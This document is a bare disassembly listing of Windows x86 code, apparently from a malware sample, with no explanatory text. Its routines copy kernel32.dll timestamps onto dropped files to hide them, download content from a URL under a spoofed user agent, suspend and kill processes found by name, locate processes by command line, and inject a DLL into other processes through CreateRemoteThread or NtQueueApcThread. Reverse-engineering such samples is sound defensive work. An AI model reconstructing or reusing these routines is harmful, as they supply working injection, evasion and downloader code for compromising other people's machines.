sub_9A5EC7 proc near ; CODE XREF: sub_9A3715+11C�p
; sub_9A6056+68�p
LastAccessTime = _FILETIME ptr -128h
CreationTime = _FILETIME ptr -120h
LastWriteTime = _FILETIME ptr -118h
hObject = dword ptr -110h
lpFileName = dword ptr -10Ch
FileName = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
hFile = dword ptr 0Ch
push ebp
lea ebp, [esp-0A8h]
sub esp, 128h
mov eax, dword_9B8788
push ebx
xor eax, ebp
push esi
mov [ebp+0A8h+var_4], eax
mov eax, [ebp+0A8h+arg_0]
push edi
mov edi, [ebp+0A8h+hFile]
mov [ebp+0A8h+lpFileName], eax
push 104h ; nSize
lea eax, [ebp+0A8h+FileName]
push eax ; lpFilename
push offset aKernel32_dll ; "kernel32.dll"
call GetModuleHandleA
push eax ; hModule
call GetModuleFileNameA
mov esi, CreateFileA
xor ebx, ebx
push ebx ; hTemplateFile
push ebx ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 3 ; dwShareMode
push 80000000h ; dwDesiredAccess
lea eax, [ebp+0A8h+FileName]
push eax ; lpFileName
call esi ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+0A8h+hObject], eax
jz loc_9A5FB7
lea ecx, [ebp+0A8h+LastWriteTime]
push ecx ; lpLastWriteTime
lea ecx, [ebp+0A8h+LastAccessTime]
push ecx ; lpLastAccessTime
lea ecx, [ebp+0A8h+CreationTime]
push ecx ; lpCreationTime
push eax ; hFile
call GetFileTime
push [ebp+0A8h+hObject] ; hObject
call CloseHandle
cmp edi, 0FFFFFFFFh
jnz short loc_9A5FA4
push [ebp+0A8h+lpFileName] ; lpFileName
call GetFileAttributesA
cmp eax, edi
jz short loc_9A5F6E
test al, 10h
jz short loc_9A5F6E
mov eax, 2000000h
jmp short loc_9A5F70
; ---------------------------------------------------------------------------
loc_9A5F6E: ; CODE XREF: sub_9A5EC7+9A�j
; sub_9A5EC7+9E�j
xor eax, eax
loc_9A5F70: ; CODE XREF: sub_9A5EC7+A5�j
push ebx ; hTemplateFile
push eax ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 7 ; dwShareMode
push 40000000h ; dwDesiredAccess
push [ebp+0A8h+lpFileName] ; lpFileName
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9A5FB7
lea eax, [ebp+0A8h+LastWriteTime]
push eax ; lpLastWriteTime
lea eax, [ebp+0A8h+LastAccessTime]
push eax ; lpLastAccessTime
lea eax, [ebp+0A8h+CreationTime]
push eax ; lpCreationTime
push esi ; hFile
call SetFileTime
push esi ; hObject
call CloseHandle
jmp short loc_9A5FB7
; ---------------------------------------------------------------------------
loc_9A5FA4: ; CODE XREF: sub_9A5EC7+8D�j
lea eax, [ebp+0A8h+LastWriteTime]
push eax ; lpLastWriteTime
lea eax, [ebp+0A8h+LastAccessTime]
push eax ; lpLastAccessTime
lea eax, [ebp+0A8h+CreationTime]
push eax ; lpCreationTime
push edi ; hFile
call SetFileTime
loc_9A5FB7: ; CODE XREF: sub_9A5EC7+68�j
; sub_9A5EC7+BF�j ...
mov ecx, [ebp+0A8h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_9AAAC1
add ebp, 0A8h
leave
retn
sub_9A5EC7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A5FCF(int,LPCSTR lpFileName)
sub_9A5FCF proc near ; CODE XREF: sub_9A3715+C1�p
var_C = dword ptr -0Ch
hObject = dword ptr -8
NumberOfBytesRead= dword ptr -4
arg_0 = dword ptr 8
lpFileName = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
xor esi, esi
push esi ; hTemplateFile
push esi ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push esi ; lpSecurityAttributes
push 3 ; dwShareMode
push 80000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
mov [ebp+var_C], esi
call CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+hObject], eax
jz short loc_9A6050
push ebx
push edi
push esi ; lpFileSizeHigh
push eax ; hFile
call GetFileSize
mov edi, eax
push edi ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov ebx, eax
cmp ebx, esi
jz short loc_9A6045
push esi ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push edi ; nNumberOfBytesToRead
push ebx ; lpBuffer
push [ebp+hObject] ; hFile
mov [ebp+NumberOfBytesRead], esi
call ReadFile
test eax, eax
jz short loc_9A603E
cmp [ebp+NumberOfBytesRead], edi
jnz short loc_9A603E
cmp [ebp+NumberOfBytesRead], esi
jz short loc_9A603E
mov eax, [ebp+arg_0]
mov [ebp+var_C], ebx
mov [eax], edi
jmp short loc_9A6045
; ---------------------------------------------------------------------------
loc_9A603E: ; CODE XREF: sub_9A5FCF+59�j
; sub_9A5FCF+5E�j ...
push ebx ; hMem
call GlobalFree
loc_9A6045: ; CODE XREF: sub_9A5FCF+42�j
; sub_9A5FCF+6D�j
push [ebp+hObject] ; hObject
call CloseHandle
pop edi
pop ebx
loc_9A6050: ; CODE XREF: sub_9A5FCF+27�j
mov eax, [ebp+var_C]
pop esi
leave
retn
sub_9A5FCF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A6056(LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPCSTR lpFileName)
sub_9A6056 proc near ; CODE XREF: sub_9A3715+DC�p
NumberOfBytesWritten= dword ptr -8
var_4 = dword ptr -4
lpBuffer = dword ptr 8
nNumberOfBytesToWrite= dword ptr 0Ch
lpFileName = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
xor esi, esi
push esi ; hTemplateFile
push esi ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push esi ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
mov [ebp+var_4], esi
call CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_9A60D0
push ebx
push edi ; hFile
mov [ebp+NumberOfBytesWritten], esi
call SetEndOfFile
mov ebx, [ebp+nNumberOfBytesToWrite]
push esi ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push ebx ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push edi ; hFile
call WriteFile
test eax, eax
jz short loc_9A60AC
cmp [ebp+NumberOfBytesWritten], ebx
jnz short loc_9A60AC
mov [ebp+var_4], 1
loc_9A60AC: ; CODE XREF: sub_9A6056+48�j
; sub_9A6056+4D�j
push edi ; hObject
call CloseHandle
cmp [ebp+var_4], esi
pop ebx
jz short loc_9A60C7
push 0FFFFFFFFh ; hFile
push [ebp+lpFileName] ; int
call sub_9A5EC7
pop ecx
pop ecx
jmp short loc_9A60D0
; ---------------------------------------------------------------------------
loc_9A60C7: ; CODE XREF: sub_9A6056+61�j
push [ebp+lpFileName] ; lpFileName
call DeleteFileA
loc_9A60D0: ; CODE XREF: sub_9A6056+26�j
; sub_9A6056+6F�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_9A6056 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=3B4h
sub_9A60D7 proc near ; CODE XREF: sub_9A8179+10�p
dwFlags = dword ptr -434h
var_430 = dword ptr -430h
dwIndex = dword ptr -42Ch
var_428 = dword ptr -428h
Buffer = dword ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
hInternet = dword ptr -418h
dwBufferLength = dword ptr -414h
var_410 = dword ptr -410h
Size = dword ptr -40Ch
hMem = dword ptr -408h
szAgent = byte ptr -404h
var_403 = byte ptr -403h
var_4 = dword ptr -4
lpszUrl = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-3B4h]
sub esp, 434h
mov eax, dword_9B8788
push ebx
mov ebx, [ebp+3B4h+lpszUrl]
push esi
xor eax, ebp
mov esi, 10000h
mov [ebp+3B4h+var_4], eax
mov eax, [ebp+3B4h+arg_4]
and dword ptr [eax], 0
push esi ; dwBytes
push 40h ; uFlags
mov [ebp+3B4h+var_41C], eax
mov [ebp+3B4h+Size], esi
call GlobalAlloc
test eax, eax
mov [ebp+3B4h+hMem], eax
jz loc_9A628C
push 0 ; dwReserved
lea eax, [ebp+3B4h+dwFlags]
push eax ; lpdwFlags
call InternetGetConnectedState
test eax, eax
jz loc_9A628C
push edi ; dwNumberOfBytesToRead
xor eax, eax
mov [ebp+3B4h+szAgent], 0
mov ecx, 0FFh
lea edi, [ebp+3B4h+var_403]
rep stosd
stosw
stosb
lea eax, [ebp+3B4h+dwBufferLength]
push eax ; cbSize
lea eax, [ebp+3B4h+szAgent]
push eax ; pszUAOut
xor edi, edi
push edi ; dwOption
mov [ebp+3B4h+dwBufferLength], 400h
call ObtainUserAgentString
xor eax, eax
cmp [ebp+3B4h+arg_8], edi
push edi ; dwFlags
setnz al
push edi ; lpszProxyBypass
push edi ; lpszProxy
push eax ; dwAccessType
lea eax, [ebp+3B4h+szAgent]
push eax ; lpszAgent
call InternetOpenA
cmp eax, edi
mov [ebp+3B4h+hInternet], eax
jz loc_9A628B
call GetTickCount
push edi ; dwContext
push 84080300h ; dwFlags
push edi ; dwHeadersLength
push edi ; lpszHeaders
push ebx ; lpszUrl
push [ebp+3B4h+hInternet] ; hInternet
mov [ebp+3B4h+var_428], eax
call InternetOpenUrlA
mov ebx, eax
cmp ebx, edi
mov [ebp+3B4h+var_420], ebx
jz loc_9A6282
lea eax, [ebp+3B4h+dwIndex]
push eax ; lpdwIndex
lea eax, [ebp+3B4h+dwBufferLength]
push eax ; lpdwBufferLength
lea eax, [ebp+3B4h+Buffer]
push eax ; lpBuffer
push 20000013h ; dwInfoLevel
push ebx ; hRequest
mov [ebp+3B4h+Buffer], 1F4h
mov [ebp+3B4h+dwIndex], edi
mov [ebp+3B4h+dwBufferLength], 4
call HttpQueryInfoA
test eax, eax
jz loc_9A6279
cmp [ebp+3B4h+Buffer], 0C8h
jnz loc_9A6279
lea eax, [ebp+3B4h+var_410]
push eax ; lpBuffer
push esi ; hFile
push [ebp+3B4h+hMem]
mov esi, InternetReadFile
mov [ebp+3B4h+var_410], edi
push ebx
jmp short loc_9A626E
; ---------------------------------------------------------------------------
loc_9A61FF: ; CODE XREF: sub_9A60D7+19B�j
cmp [ebp+3B4h+var_410], 0
jz short loc_9A6274
add edi, [ebp+3B4h+var_410]
call GetTickCount
sub eax, [ebp+3B4h+var_428]
cmp eax, 493E0h
ja short loc_9A6274
mov eax, [ebp+3B4h+Size]
cmp edi, eax
jnz short loc_9A625B
cmp edi, 7D000h
jnb short loc_9A6274
lea ebx, [eax+eax]
push ebx ; dwBytes
push 40h ; uFlags
call GlobalAlloc
test eax, eax
mov [ebp+3B4h+var_430], eax
jz short loc_9A6274
push [ebp+3B4h+Size] ; Size
push [ebp+3B4h+hMem] ; Src
push eax ; Dst
call memcpy
add esp, 0Ch
push [ebp+3B4h+hMem] ; hMem
call GlobalFree
mov eax, [ebp+3B4h+var_430]
mov [ebp+3B4h+hMem], eax
mov [ebp+3B4h+Size], ebx
loc_9A625B: ; CODE XREF: sub_9A60D7+146�j
lea eax, [ebp+3B4h+var_410]
push eax
mov eax, [ebp+3B4h+Size]
sub eax, edi
push eax
mov eax, [ebp+3B4h+hMem]
add eax, edi
push eax
push [ebp+3B4h+var_420]
loc_9A626E: ; CODE XREF: sub_9A60D7+126�j
call esi ; InternetReadFile
test eax, eax
jnz short loc_9A61FF
loc_9A6274: ; CODE XREF: sub_9A60D7+12C�j
; sub_9A60D7+13F�j ...
mov eax, [ebp+3B4h+var_41C]
mov [eax], edi
loc_9A6279: ; CODE XREF: sub_9A60D7+101�j
; sub_9A60D7+10E�j
push [ebp+3B4h+var_420] ; hInternet
call InternetCloseHandle
loc_9A6282: ; CODE XREF: sub_9A60D7+D0�j
push [ebp+3B4h+hInternet] ; hInternet
call InternetCloseHandle
loc_9A628B: ; CODE XREF: sub_9A60D7+A8�j
pop edi
loc_9A628C: ; CODE XREF: sub_9A60D7+45�j
; sub_9A60D7+59�j
mov eax, [ebp+3B4h+var_41C]
xor esi, esi
cmp [eax], esi
jnz short loc_9A62A6
cmp [ebp+3B4h+hMem], esi
jz short loc_9A62A6
push [ebp+3B4h+hMem] ; hMem
call GlobalFree
mov [ebp+3B4h+hMem], esi
loc_9A62A6: ; CODE XREF: sub_9A60D7+1BC�j
; sub_9A60D7+1C1�j
mov ecx, [ebp+3B4h+var_4]
mov eax, [ebp+3B4h+hMem]
pop esi
xor ecx, ebp
pop ebx
call sub_9AAAC1
add ebp, 3B4h
leave
retn
sub_9A60D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A62C0(DWORD dwProcessId)
sub_9A62C0 proc near ; CODE XREF: sub_9A4074+A0�p
te = THREADENTRY32 ptr -44h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
hObject = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
dwProcessId = dword ptr 8
push 34h
push offset stru_9A2A58
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_20], ebx
mov [ebp+ms_exc.disabled], ebx
push ebx ; th32ProcessID
push 4 ; dwFlags
call CreateToolhelp32Snapshot
mov [ebp+hObject], eax
cmp eax, 0FFFFFFFFh
jz short loc_9A634A
mov [ebp+te.dwSize], ebx
push 6
pop ecx
xor eax, eax
lea edi, [ebp+te.cntUsage]
rep stosd
mov [ebp+te.dwSize], 1Ch
lea eax, [ebp+te]
push eax ; lpte
push [ebp+hObject] ; hSnapshot
call Thread32First
jmp short loc_9A633D
; ---------------------------------------------------------------------------
loc_9A6306: ; CODE XREF: sub_9A62C0+7F�j
mov eax, [ebp+dwProcessId]
cmp eax, [ebp+te.th32OwnerProcessID]
jnz short loc_9A6331
push [ebp+te.th32ThreadID] ; dwThreadId
push ebx ; bInheritHandle
push 2 ; dwDesiredAccess
call OpenThread
mov esi, eax
mov [ebp+var_24], esi
cmp esi, ebx
jz short loc_9A6331
push esi ; hThread
call SuspendThread
push esi ; hObject
call CloseHandle
loc_9A6331: ; CODE XREF: sub_9A62C0+4C�j
; sub_9A62C0+61�j
lea eax, [ebp+te]
push eax ; lpte
push [ebp+hObject] ; hSnapshot
call Thread32Next
loc_9A633D: ; CODE XREF: sub_9A62C0+44�j
test eax, eax
jnz short loc_9A6306
push [ebp+hObject] ; hObject
call CloseHandle
loc_9A634A: ; CODE XREF: sub_9A62C0+22�j
push [ebp+dwProcessId] ; dwProcessId
push ebx ; bInheritHandle
xor edi, edi
inc edi
push edi ; dwDesiredAccess
call OpenProcess
mov esi, eax
mov [ebp+var_28], esi
cmp esi, ebx
jz short loc_9A6380
push ebx ; uExitCode
push esi ; hProcess
call TerminateProcess
test eax, eax
jz short loc_9A6370
mov [ebp+var_20], edi
loc_9A6370: ; CODE XREF: sub_9A62C0+AB�j
push esi ; hObject
call CloseHandle
jmp short loc_9A6380
; ---------------------------------------------------------------------------
loc_9A6379: ; DATA XREF: .text:stru_9A2A58�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A637D: ; DATA XREF: .text:stru_9A2A58�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A6380: ; CODE XREF: sub_9A62C0+9F�j
; sub_9A62C0+B7�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_20]
call __SEH_epilog
retn
sub_9A62C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=0B0h
; int __cdecl sub_9A638D(char *Str2)
sub_9A638D proc near ; CODE XREF: sub_9A36CC+2A�p
; sub_9A5C35+8�p
var_130 = dword ptr -130h
Str1 = PROCESSENTRY32 ptr -12Ch
var_4 = dword ptr -4
Str2 = dword ptr 8
push ebp
lea ebp, [esp-0B0h]
sub esp, 130h
mov eax, dword_9B8788
and [ebp+0B0h+var_130], 0
push ebx
push esi
mov esi, [ebp+0B0h+Str2]
push 0 ; th32ProcessID
xor eax, ebp
push 2 ; dwFlags
mov [ebp+0B0h+var_4], eax
call CreateToolhelp32Snapshot
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_9A6411
push edi
push 49h
pop ecx
xor eax, eax
mov [ebp+0B0h+Str1.dwSize], 128h
lea edi, [ebp+0B0h+Str1.cntUsage]
rep stosd
lea eax, [ebp+0B0h+Str1]
push eax ; lppe
push ebx ; hSnapshot
call Process32First
pop edi
jmp short loc_9A63FE
; ---------------------------------------------------------------------------
loc_9A63E3: ; CODE XREF: sub_9A638D+73�j
lea eax, [ebp+0B0h+Str1.szExeFile]
push esi ; Str2
push eax ; Str1
call _stricmp
test eax, eax
pop ecx
pop ecx
jz short loc_9A6404
lea eax, [ebp+0B0h+Str1]
push eax ; lppe
push ebx ; hSnapshot
call Process32Next
loc_9A63FE: ; CODE XREF: sub_9A638D+54�j
test eax, eax
jnz short loc_9A63E3
jmp short loc_9A640A
; ---------------------------------------------------------------------------
loc_9A6404: ; CODE XREF: sub_9A638D+65�j
mov eax, [ebp+0B0h+Str1.th32ProcessID]
mov [ebp+0B0h+var_130], eax
loc_9A640A: ; CODE XREF: sub_9A638D+75�j
push ebx ; hObject
call CloseHandle
loc_9A6411: ; CODE XREF: sub_9A638D+35�j
mov ecx, [ebp+0B0h+var_4]
mov eax, [ebp+0B0h+var_130]
pop esi
xor ecx, ebp
pop ebx
call sub_9AAAC1
add ebp, 0B0h
leave
retn
sub_9A638D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A642B(DWORD dwProcessId,char *lpBuffer)
sub_9A642B proc near ; CODE XREF: sub_9A36CC+1A�p
; sub_9A36CC+36�p ...
te = THREADENTRY32 ptr -3Ch
ThreadId = dword ptr -20h
NumberOfBytesWritten= dword ptr -1Ch
var_18 = dword ptr -18h
hProcess = dword ptr -14h
hObject = dword ptr -10h
lpStartAddress = dword ptr -0Ch
lpParameter = dword ptr -8
var_4 = dword ptr -4
dwProcessId = dword ptr 8
lpBuffer = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 3Ch
push edi
xor edi, edi
cmp [ebp+dwProcessId], 4
mov [ebp+var_4], edi
jbe short loc_9A6445
mov eax, [ebp+lpBuffer]
cmp byte ptr [eax], 0
jnz short loc_9A644C
loc_9A6445: ; CODE XREF: sub_9A642B+10�j
xor eax, eax
jmp loc_9A65D6
; ---------------------------------------------------------------------------
loc_9A644C: ; CODE XREF: sub_9A642B+18�j
push esi
push eax ; Str
call strlen
pop ecx
push [ebp+dwProcessId] ; dwProcessId
mov esi, eax
push edi ; bInheritHandle
push 2Ah ; dwDesiredAccess
inc esi
call OpenProcess
cmp eax, edi
mov [ebp+hProcess], eax
jz loc_9A65D2
push 40h ; flProtect
push 3000h ; flAllocationType
lea ecx, [esi+20h]
push ecx ; dwSize
push edi ; lpAddress
push eax ; hProcess
call VirtualAllocEx
cmp eax, edi
mov [ebp+lpParameter], eax
jz loc_9A65B8
mov edi, GetModuleHandleA
push ebx
push offset ProcName ; "LoadLibraryA"
push offset aKernel32_dll ; "kernel32.dll"
call edi ; GetModuleHandleA
mov ebx, GetProcAddress
push eax ; hModule
call ebx ; GetProcAddress
mov [ebp+lpStartAddress], eax
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
inc esi
push esi ; nSize
push [ebp+lpBuffer] ; lpBuffer
push [ebp+lpParameter] ; lpBaseAddress
push [ebp+hProcess] ; hProcess
call WriteProcessMemory
test eax, eax
jz loc_9A65B7
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
xor esi, esi
push esi ; dwCreationFlags
push [ebp+lpParameter] ; lpParameter
push [ebp+lpStartAddress] ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
push [ebp+hProcess] ; hProcess
call CreateRemoteThread
cmp eax, esi
jz short loc_9A64F1
mov [ebp+var_4], 1
push eax
jmp loc_9A65B1
; ---------------------------------------------------------------------------
loc_9A64F1: ; CODE XREF: sub_9A642B+B7�j
push offset aNtqueueapcthre ; "NtQueueApcThread"
push offset aNtdll_dll ; "ntdll.dll"
call edi ; GetModuleHandleA
push eax ; hModule
call ebx ; GetProcAddress
mov [ebp+var_18], eax
call GetVersion
cmp [ebp+var_18], esi
jz loc_9A65B7
cmp al, 5
jz short loc_9A6520
cmp ax, 6
jnz loc_9A65B7
loc_9A6520: ; CODE XREF: sub_9A642B+E9�j
push offset aLoadlibraryexa ; "LoadLibraryExA"
push offset aKernel32_dll ; "kernel32.dll"
call edi ; GetModuleHandleA
push eax ; hModule
call ebx ; GetProcAddress
push 0 ; th32ProcessID
push 4 ; dwFlags
mov [ebp+lpStartAddress], eax
call CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+hObject], eax
jz short loc_9A65B7
push 6
pop ecx
xor eax, eax
lea edi, [ebp+te.cntUsage]
rep stosd
lea eax, [ebp+te]
push eax ; lpte
push [ebp+hObject] ; hSnapshot
mov [ebp+te.dwSize], 1Ch
call Thread32First
jmp short loc_9A65AA
; ---------------------------------------------------------------------------
loc_9A6562: ; CODE XREF: sub_9A642B+181�j
mov eax, [ebp+dwProcessId]
cmp eax, [ebp+te.th32OwnerProcessID]
jnz short loc_9A659E
push [ebp+te.th32ThreadID] ; dwThreadId
xor esi, esi
push esi ; bInheritHandle
push 10h ; dwDesiredAccess
call OpenThread
mov edi, eax
cmp edi, esi
jz short loc_9A659E
push esi
push esi
push [ebp+lpParameter]
push [ebp+lpStartAddress]
push edi
call [ebp+var_18]
push edi ; hObject
mov ebx, eax
call CloseHandle
cmp ebx, esi
jl short loc_9A659E
mov [ebp+var_4], 1
loc_9A659E: ; CODE XREF: sub_9A642B+13D�j
; sub_9A642B+151�j ...
lea eax, [ebp+te]
push eax ; lpte
push [ebp+hObject] ; hSnapshot
call Thread32Next
loc_9A65AA: ; CODE XREF: sub_9A642B+135�j
test eax, eax
jnz short loc_9A6562
push [ebp+hObject] ; hObject
loc_9A65B1: ; CODE XREF: sub_9A642B+C1�j
call CloseHandle
loc_9A65B7: ; CODE XREF: sub_9A642B+97�j
; sub_9A642B+E1�j ...
pop ebx
loc_9A65B8: ; CODE XREF: sub_9A642B+5B�j
push [ebp+hProcess] ; hObject
call CloseHandle
cmp [ebp+var_4], 0
jz short loc_9A65D2
push 1388h ; dwMilliseconds
call Sleep
loc_9A65D2: ; CODE XREF: sub_9A642B+3D�j
; sub_9A642B+19A�j
mov eax, [ebp+var_4]
pop esi
loc_9A65D6: ; CODE XREF: sub_9A642B+1C�j
pop edi
leave
retn
sub_9A642B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_9A65D9 proc near ; CODE XREF: sub_9A6678+60�p
Dst = word ptr -94h
var_90 = dword ptr -90h
lpBuffer = dword ptr -8Ch
NumberOfBytesRead= dword ptr -88h
Buffer = byte ptr -84h
var_74 = dword ptr -74h
Src = byte ptr -44h
var_4 = dword ptr -4
lpBaseAddress = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 94h
mov eax, dword_9B8788
push esi
mov esi, ReadProcessMemory
push edi
mov [ebp+70h+lpBuffer], ecx
lea ecx, [ebp+70h+NumberOfBytesRead]
push ecx ; lpNumberOfBytesRead
xor eax, ebp
mov edi, 80h
push edi ; nSize
lea ecx, [ebp+70h+Buffer]
mov [ebp+70h+var_4], eax
mov eax, [ebp+70h+lpBaseAddress]
push ecx ; lpBuffer
push eax ; lpBaseAddress
push ebx ; hProcess
call esi ; ReadProcessMemory
test eax, eax
jnz short loc_9A6616
loc_9A6612: ; CODE XREF: sub_9A65D9+4E�j
; sub_9A65D9+6E�j
xor eax, eax
jmp short loc_9A6667
; ---------------------------------------------------------------------------
loc_9A6616: ; CODE XREF: sub_9A65D9+37�j
lea eax, [ebp+70h+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push edi ; nSize
lea eax, [ebp+70h+Buffer]
push eax ; lpBuffer
push [ebp+70h+var_74] ; lpBaseAddress
push ebx ; hProcess
call esi ; ReadProcessMemory
test eax, eax
jz short loc_9A6612
push 8 ; Size
lea eax, [ebp+70h+Src]
push eax ; Src
lea eax, [ebp+70h+Dst]
push eax ; Dst
call memcpy
movzx eax, [ebp+70h+Dst]
mov ecx, [ebp+70h+arg_4]
add esp, 0Ch
shr eax, 1
dec ecx
cmp ecx, eax
jb short loc_9A6612
mov ecx, [ebp+70h+lpBuffer]
and word ptr [ecx+eax*2], 0
lea eax, [ebp+70h+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
movzx eax, [ebp+70h+Dst]
push eax ; nSize
push ecx ; lpBuffer
push [ebp+70h+var_90] ; lpBaseAddress
push ebx ; hProcess
call esi ; ReadProcessMemory
neg eax
sbb eax, eax
neg eax
loc_9A6667: ; CODE XREF: sub_9A65D9+3B�j
mov ecx, [ebp+70h+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_9AAAC1
add ebp, 70h
leave
retn
sub_9A65D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A6678(DWORD dwProcessId,int,int)
sub_9A6678 proc near ; CODE XREF: sub_9A66EF+81�p
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_4 = byte ptr -4
dwProcessId = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aNtqueryinforma ; "NtQueryInformationProcess"
push offset aNtdll_dll ; "ntdll.dll"
call GetModuleHandleA
push eax ; hModule
call GetProcAddress
mov edi, eax
xor esi, esi
cmp edi, esi
jnz short loc_9A66A3
xor eax, eax
jmp short loc_9A66EB
; ---------------------------------------------------------------------------
loc_9A66A3: ; CODE XREF: sub_9A6678+25�j
push ebx
push [ebp+dwProcessId] ; dwProcessId
push esi ; bInheritHandle
push 410h ; dwDesiredAccess
call OpenProcess
mov ebx, eax
cmp ebx, esi
jnz short loc_9A66BD
xor eax, eax
jmp short loc_9A66EA
; ---------------------------------------------------------------------------
loc_9A66BD: ; CODE XREF: sub_9A6678+3F�j
lea eax, [ebp+var_4]
push eax
push 18h
lea eax, [ebp+var_1C]
push eax
push esi
push ebx
call edi
test eax, eax
jl short loc_9A66E1
push [ebp+arg_8]
mov ecx, [ebp+arg_4]
push [ebp+var_18]
call sub_9A65D9
pop ecx
pop ecx
mov esi, eax
loc_9A66E1: ; CODE XREF: sub_9A6678+55�j
push ebx ; hObject
call CloseHandle
mov eax, esi
loc_9A66EA: ; CODE XREF: sub_9A6678+43�j
pop ebx
loc_9A66EB: ; CODE XREF: sub_9A6678+29�j
pop edi
pop esi
leave
retn
sub_9A6678 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2B8h
; int __cdecl sub_9A66EF(LPCWSTR lpSrch)
sub_9A66EF proc near ; CODE XREF: sub_9A36CC+9�p
; sub_9A5C01+8�p
var_338 = dword ptr -338h
dwProcessId = PROCESSENTRY32 ptr -334h
First = word ptr -20Ch
var_20A = byte ptr -20Ah
var_4 = dword ptr -4
lpSrch = dword ptr 8
push ebp
lea ebp, [esp-2B8h]
sub esp, 338h
mov eax, dword_9B8788
and [ebp+2B8h+var_338], 0
push ebx
push esi
mov esi, [ebp+2B8h+lpSrch]
push 0 ; th32ProcessID
xor eax, ebp
push 2 ; dwFlags
mov [ebp+2B8h+var_4], eax
call CreateToolhelp32Snapshot
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_9A67AC
push edi
push 49h
pop ecx
xor eax, eax
mov [ebp+2B8h+dwProcessId.dwSize], 128h
lea edi, [ebp+2B8h+dwProcessId.cntUsage]
rep stosd
lea eax, [ebp+2B8h+dwProcessId]
push eax ; lppe
push ebx ; hSnapshot
call Process32First
jmp short loc_9A6798
; ---------------------------------------------------------------------------
loc_9A6748: ; CODE XREF: sub_9A66EF+AB�j
and [ebp+2B8h+First], 0
xor eax, eax
mov ecx, 81h
lea edi, [ebp+2B8h+var_20A]
rep stosd
stosw
push 104h ; int
lea eax, [ebp+2B8h+First]
push eax ; int
push [ebp+2B8h+dwProcessId.th32ProcessID] ; dwProcessId
call sub_9A6678
add esp, 0Ch
test eax, eax
jz short loc_9A678E
push esi ; lpSrch
lea eax, [ebp+2B8h+First]
push eax ; lpFirst
call StrStrIW
test eax, eax
jnz short loc_9A679E
loc_9A678E: ; CODE XREF: sub_9A66EF+8B�j
lea eax, [ebp+2B8h+dwProcessId]
push eax ; lppe
push ebx ; hSnapshot
call Process32Next
loc_9A6798: ; CODE XREF: sub_9A66EF+57�j
test eax, eax
jnz short loc_9A6748
jmp short loc_9A67A4
; ---------------------------------------------------------------------------
loc_9A679E: ; CODE XREF: sub_9A66EF+9D�j
mov eax, [ebp+2B8h+dwProcessId.th32ProcessID]
mov [ebp+2B8h+var_338], eax
loc_9A67A4: ; CODE XREF: sub_9A66EF+AD�j
push ebx ; hObject
call CloseHandle
pop edi
loc_9A67AC: ; CODE XREF: sub_9A66EF+35�j
mov ecx, [ebp+2B8h+var_4]
mov eax, [ebp+2B8h+var_338]
pop esi
xor ecx, ebp
pop ebx
call sub_9AAAC1
add ebp, 2B8h
leave
retn
sub_9A66EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
